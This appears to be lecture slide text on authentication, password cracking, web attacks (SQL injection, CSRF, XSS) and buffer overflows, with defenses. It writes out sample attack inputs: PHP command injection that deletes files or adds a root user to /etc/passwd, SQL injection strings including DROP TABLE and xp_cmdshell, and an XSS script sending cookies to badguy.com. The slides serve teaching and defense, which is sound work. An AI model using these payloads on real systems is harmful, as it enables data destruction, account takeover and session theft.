1. password attack · the host does not need to know the passwords. the host just has to be able to...

1. PASSWORD ATTACK

2. APPLICATION ATTACK

References:

1. Bruce Schneier, Applied Cryptography

2. CEH v7 Tutorial

21/03/2017

2

Authentication

Authentication using One-Way Functions

Authentication using Public-Key Cryptography

Attack

21/03/2017 3

Authentication

21/03/2017 4

When Alice logs into a host computer, how does the host know who she is?

How does the host know she is not Eve trying to falsify Alice’s identity?

Traditionally, passwords solve this problem.

Both Alice and the host know this secret piece of knowledge and the hostrequests it from Alice every time she tries to log in.

21/03/2017 5

Authentication using

One-Way Functions

21/03/2017 6

The host does not need to know the passwords.

The host just has to be able to differentiate valid passwords from invalidpasswords. This is easy with one-way functions.

Instead of storing passwords, the host stores one-way functions of thepasswords.

21/03/2017 7

1. Alice sends the host her password.

2. The host performs a one-way function on the password.

3. The host compares the result of the one-way function to the value itpreviously stored.

21/03/2017 8

Since the host no longer stores a table of everybody’s valid password, thethreat of someone breaking into the host and stealing the password list ismitigated.

The list of passwords operated on by the one-way function is useless, becausethe one-way function cannot be reversed to recover the passwords.

21/03/2017 9

Authentication using

Public-Key Cryptography

21/03/2017 10

PROBLEM :

When Alice sends her password to her host, anyone who has access to herdata path can read it.

Eve can be at any one of those points, listening to Alice’s login sequence. IfEve has access to the processor memory of the host, she can see thepassword before the host hashes it.

21/03/2017 11

Public-key cryptography can solve this

problem.

The hostkeeps a file of every user’s public key.

All userskeep their

own private keys. 21/03/2017 12

• The host sends Alice a randomstring.

• Alice encrypts the string with herprivate key and sends it back to thehost, along with her name.

• The host looks up Alice’s public keyin its database and decrypts themessage using that public key.

• If the decrypted string matches whatthe host sent Alice in the first place,the host allows Alice access to thesystem.

When logging in, the

protocol proceeds

as follows:

21/03/2017 13

Secure proof-of-identity protocols take thefollowing form:

• Alice performs a computation based on some random numbers and her private key and sends the result to the host.

• The host sends Alice a different random number.

• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.

• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.

• If she does, her identity is verified. 21/03/2017 14

If Alice does not trust the host any more than the host trusts Alice, then Alicewill require the host to prove its identity in the same manner.

Step (1) might seem unnecessary and confusing, but it is required to preventattacks against the protocol.

21/03/2017 15

21/03/2017 16

(a) Dictionary attack

(b) Brute force Attack

(c) Hybrid Attack

(d) Syllable Attack

(e) Rule-based Attack

21/03/2017 17

Password Cracking Techniques

(a) Based on familiar password

(b) tries every combination of character

(c) Like dictionary attack, but adds some number and symbol

(d) Combination brute force attack and dictionary attack

(e) Used when the attacker gets some information about

password

21/03/2017 18

21/03/2017 19

Keylogger is a

program that runs in

the background and

allow remote

attackers to record

every keystroke

Trojan enabling

attackers to gets

access to the stored

password in the

attacked computer

Spyware is a type of

malware that allows

attackers to get secret key

gather information about

person or organization

21/03/2017 20

What does spyware do?

Steals user’s personal information and send it to remote server

Monitor user’s online activity

Display annoying pop up and redirect browser to advertising site

Decrease overall system security level

Connects to remote pornography sites

Reduce systems performance and causes software instability

21/03/2017 21

Purpose of Trojan:

Steal information such as password, security codes, credit card information, using keylogger

Delete or replace OS system critical file

Generate fake traffic to create DoS attack

Disable firewall and antivirus

Use victim’s PC for spamming

Use victim’s PC as a botnet

21/03/2017 22

21/03/2017 23

Default password is a password supplies by the manufacturer with new equipment that is password protected

Ex:

www.defaultpassword.com

21/03/2017 24

Windows stores user password in the Security Acccount Manager (SAM) not clear text, but hashed.

21/03/2017 25

References:

1. Network Security. John Mitchell. Standford University

2. CEH v7 Tutorial

21/03/2017

26

Web Attacker

Sets up malicious

site visited by

victim; no control

of network

Alice

System

Web security threat model

Network Attacker

Intercepts and

controls network

communication

Alice

System

Network security threat model

Web Attacker

Alice

System

Network Attacker

Alice

System

SQL Injection

Browser sends malicious input to server

Bad input checking fails to block malicious SQL

CSRF – Cross-site request forgery

Bad web site sends browser request to good web site, using credentials of an innocent victim

XSS – Cross-site scripting

Bad web site sends innocent victim a script that steals information from an honest web site

SQL Injection

Browser sends malicious input to server

Bad input checking leads to malicious SQL query

CSRF – Cross-site request forgery

Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site

XSS – Cross-site scripting

Bad web site sends innocent victim a script that steals information from an honest web site

Inject malicious script into

trusted context

Leverage user’s session at

victim sever

Uses SQL to change meaning of

database command

Background for SQL Injection

Attack goal: execute arbitrary code on the server

Examplecode injection based on eval (PHP)

http://site.com/calc.php (server side calculator)

Attackhttp://site.com/calc.php?exp=“ 10 ; system(‘rm *.*’) ”

(URL encoded)

…

$in = $_GET[‘exp'];

eval('$ans = ' . $in . ';');

…

Example: PHP server-side code for sending email

Attacker can post

OR

$email = $_POST[“email”]

$subject = $_POST[“subject”]

system(“mail $email –s $subject < /tmp/joinmynetwork”)

http://yourdomain.com/mail.php?

email=hacker@hackerhome.net &

subject=foo < /usr/passwd; ls

http://yourdomain.com/mail.php?

email=hacker@hackerhome.net&subject=foo;

echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Sample PHP

ProblemWhat if ‘recipient’ is malicious string that changes the meaning of the query?

(the wrong way)

$recipient = $_POST[‘recipient’];

$sql = "SELECT PersonID FROM Person WHERE

Username='$recipient'";

$rs = $db->executeQuery($sql);

38

Victim Server

Victim SQL DB

Attacker

unintended

SQL queryreceive valuable data

1

2

3

39

CardSystems

credit card payment processing company

SQL injection attack in June 2005

put out of business

The Attack

263,000 credit card #s stolen from database

credit card #s stored unencrypted

43 million credit card #s exposed

WordPress SEO plugin by Yoast, March 2015

“The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.

“The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.

https://wpvulndb.com/vulnerabilities/7841

41

set ok = execute( "SELECT * FROM Users

WHERE user=' " & form(“user”) & " '

AND pwd=' " & form(“pwd”) & “ '” );

if not ok.EOF

login success

else fail;

Is this exploitable?

Web

Server

Web

Browser

(Client)DB

Enter

Username

&

Password

SELECT *

FROM Users

WHERE user='me'

AND pwd='1234'

Normal Query

43

Suppose user = “ ' or 1=1 -- ” (URL encoded)

Then scripts does:ok = execute( SELECT …

WHERE user= ' ' or 1=1 -- … )

The “--” causes rest of line to be ignored.

Now ok.EOF is always false and login succeeds.

The bad news: easy login to many sites this way.

44

Suppose user =

“ ′ ; DROP TABLE Users -- ”

Then script does:

ok = execute( SELECT …

WHERE user= ′ ′ ; DROP TABLE Users … )

Deletes user table

Similarly: attacker can add users, reset pwds, etc.

45

Suppose user =

′ ; exec cmdshell

′net user badguy badpwd′ / ADD --

Then script does:ok = execute( SELECT …

WHERE username= ′ ′ ; exec … )

If SQL server context runs as “sa”, attacker gets account on DB server

46

0x 5c \

0x bf 27 ¿′

0x bf 5c

PHP: addslashes( “ ’ or 1 = 1 -- ”)

outputs: “ \’ or 1=1 -- ”

Unicode attack: (GBK)

$user = 0x bf 27

addslashes ($user) 0x bf 5c 27

Correct implementation: mysql_real_escape_string()

′

Never build SQL commands yourself !

Use parameterized/prepared SQL

Use ORM framework

48

Builds SQL queries by properly escaping args: ′ \′

Example: Parameterized SQL: (ASP.NET 1.1)

Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(

"SELECT * FROM UserTable WHERE

username = @User AND

password = @Pwd", dbConnection);

cmd.Parameters.Add("@User", Request[“user”] );

cmd.Parameters.Add("@Pwd", Request[“pwd”] );

cmd.ExecuteReader();

In PHP: bound parameters -- similar function

ServerBrowser

51

Attack Server

Server Victim

User Victim

1

2

4

Q: how long do you stay logged in to Gmail? Facebook? ….

Example:

User logs in to bank.com

Session cookie remains in browser state

User visits another site containing:

<form name=F action=http://bank.com/BillPay.php>

<input name=recipient value=badguy> …

<script> document.F.submit(); </script>

Browser sends user auth cookie with request

Transaction will be fulfilled

Problem:

cookie auth is insufficient when side effects occur

User credentials

Cookie: SessionID=523FA4cd2E

54

Bad web site

Home router

User

1

2

3

4

Fact:

50% of home users have broadband router with a default or no password

Drive-by Pharming attack: User visits malicious site JavaScript at site scans home network looking for broadband router:

• SOP allows “send only” messages

• Detect success using onerror:

<IMG SRC=192.168.0.1 onError = do() >

Once found, login to router and change DNS server

Problem: “send-only” access sufficient to reprogram router

[SRJ’07]

referer: http://www.site.com

referer: http://www.site.com

What if honest site sends POST to attacker.com?

Solution: origin header records redirect

Login CSRF Strict Referer/Origin header validation

Login forms typically submit over HTTPS, not blocked

HTTPS sites, such as banking sites Use strict Referer/Origin validation to prevent CSRF

Other Use Ruby-on-Rails or other framework that

implements secret token method correctly

Origin header Alternative to Referer with fewer privacy problems

Sent only on POST, sends only necessary data

Defense against redirect-based attacks

Attack Server

Victim Server

Victim client

1

2

5

search field on victim.com:

http://victim.com/search.php ? term = apple

Server-side implementation of search.php:

<HTML> <TITLE> Search Results </TITLE>

<BODY>

Results for <?php echo $_GET[term] ?> :

. . .

</BODY> </HTML>

echo search term

into response

Consider link: (properly URL encoded)

http://victim.com/search.php ? term =

<script> window.open(

“http://badguy.com?cookie = ” +

document.cookie ) </script>

What if user clicks on this link?

1. Browser goes to victim.com/search.php

2. Victim.com returns

<HTML> Results for <script> … </script>

3. Browser executes script:

Sends badguy.com cookie for victim.com

<html>

Results for

<script>

window.open(http://attacker.com?

... document.cookie ...)

</script>

</html>

Attack Server

Victim Server

Victim client

http://victim.com/search.php ?

term = <script> ... </script>

www.victim.com

www.attacker.com

An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application

Methods for injecting malicious code:Reflected XSS (“type 1”) the attack script is reflected back to the user as part of a page from the

victim site

Stored XSS (“type 2”) the attacker stores the malicious code in a resource managed by the web

application, such as a database

Others, such as DOM-based attacks

Attack Server

Server Victim

User Victim

1

2

5

Email version

Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.

Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.

Victims were then redirected to a phishing site and prompted to enter sensitive financial data.

Source: http://www.acunetix.com/news/paypal.htm

SQL Injection Bad input checking allows malicious SQL query

Known defenses address problem effectively

CSRF – Cross-site request forgery Forged request leveraging ongoing session

Can be prevented (if XSS problems fixed)

XSS – Cross-site scripting Problem stems from echoing untrusted input

Difficult to prevent; requires care, testing, tools, …

Other server vulnerabilities Increasing knowledge embedded in frameworks, tools, application development

recommendations

Ref

1. Professor Hossein Saiedian. KU electrical negineering and komputer science.

“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”

A very common attack mechanism

from 1988 Morris Worm to Code Red, Slammer, Sasser and many others

Prevention techniques known

Still of major concern due to

legacy of widely deployed buggy

continued careless programming techniques

Caused by programming error

Allows more data to be stored than capacity available in a fixed sized buffer

buffer can be on stack, heap, global data

Overwriting adjacent memory locations

corruption of program data

unexpected transfer of control

memory access violation

execution of code chosen by attacker

int main(int argc, char *argv[]) {

int valid = FALSE;

char str1[8];

char str2[8];

next_tag(str1);

gets(str2);

if (strncmp(str1, str2, 8) == 0)

valid = TRUE;

printf("buffer1: str1(%s), str2(%s),

valid(%d)\n", str1, str2, valid);

}

$ cc -g -o buffer1 buffer1.c$ ./buffer1

START

buffer1: str1(START), str2(START), valid(1)

$ ./buffer1

EVILINPUTVALUE

buffer1: str1(TVALUE),

str2(EVILINPUTVALUE), valid(0)

$ ./buffer1BADINPUTBADINPUT

buffer1: str1(BADINPUT),

str2(BADINPUTBADINPUT), valid(1)

Memory

Address

Before

gets(str2)

After

gets(str2)

Contains

Value of

. . . .

. . . .

. . . .

bffffbf4 34fcffbf

4 . . .

34fcffbf

3 . . .

argv

bffffbf0 01000000

. . . .

01000000

. . . .

argc

bffffbec c6bd0340

. . . @

c6bd0340

. . . @

return

addr

bffffbe8 08fcffbf

. . . .

08fcffbf

. . . .

old base

ptr

bffffbe4 00000000

. . . .

01000000

. . . .

valid

bffffbe0 80640140

. d . @

00640140

. d . @

bffffbdc 54001540

T . . @

4e505554

N P U T

str1[4-7]

bffffbd8 53544152

S T A R

42414449

B A D I

str1[0-3]

bffffbd4 00850408

. . . .

4e505554

N P U T

str2[4-7]

bffffbd0 30561540

0 V . @

42414449

B A D I

str2[0-3]

. . . .

. . . .

. . . .

To exploit a buffer overflow an attacker

must identify a buffer overflow vulnerability in some program

inspection, tracing execution, fuzzing tools

understand how buffer is stored in memory and determine potential for corruption

At machine level all data an array of bytes interpretation depends on instructions used

Modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows

does incur overhead, some limits on use

C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow

have a large legacy of widely used, unsafe, and hence vulnerable code

Stack frame:

Calling function: needs a data

structure to store the “return”

address and parameters to be

passed

Called function: needs a place

to store its local variables

somewhere different for every call

Occurs when buffer is located on stack

used by Morris Worm

“Smashing the Stack” paper popularized it

Have local variables below saved frame pointer and return address

hence overflow of a local buffer can potentially overwrite these key control items

Attacker overwrites return address with address of desired code

program, system library or loaded in buffer

Buffer overflows are widely exploited

Large amount of vulnerable code in use

despite cause and countermeasures known

Two broad defense approaches

compile-time - harden new programs

run-time - handle attacks on existing programs

Use a modern high-level languages with strong typing

not vulnerable to buffer overflow

compiler enforces range checks and permissible operations on variables

Do have cost in resource use

And restrictions on access to hardware

so still need some code in C like languages

If using potentially unsafe languages eg C

Programmer must explicitly write safe code

by design with new code

extensive after code review of existing code, (e.g., OpenBSD)

Buffer overflow safety a subset of general safe coding techniques

Allow for graceful failure (know how things may go wrong)

check for sufficient space in any buffer

Proposals for safety extensions (library replacements) to C

performance penalties

must compile programs with special compiler

Several safer standard library variants

new functions, e.g. strlcpy()

safer re-implementation of standard functions as a dynamic library, e.g. Libsafe

Stackgaurd: add function entry and exit code to check stack for signs of corruption Use random canary

e.g. Stackguard, Win/GS, GCC

check for overwrite between local variables and saved frame pointer and return address

abort program if change found

issues: recompilation, debugger support

Or save/check safe copy of return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD

Many BO attacks copy machine code into buffer and xfer ctrl to it

Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker’s code) e.g. stack, heap, global data

need h/w support in MMU

long existed on SPARC/Solaris systems

recent on x86 Linux/Unix/Windows systems

Issues: support for executable stack code

Manipulate location of key data structures

stack, heap, global data: change address by 1 MB

using random shift for each process

have large address range on modern systems means wasting some has negligible impact

Randomize location of heap buffers and location of standard library functions

Place guard pages between critical regions of memory (or between stack frames)

flagged in MMU (mem mgmt unit) as illegal addresses

any access aborts process

Can even place between stack frames and heap buffers

at execution time and space cost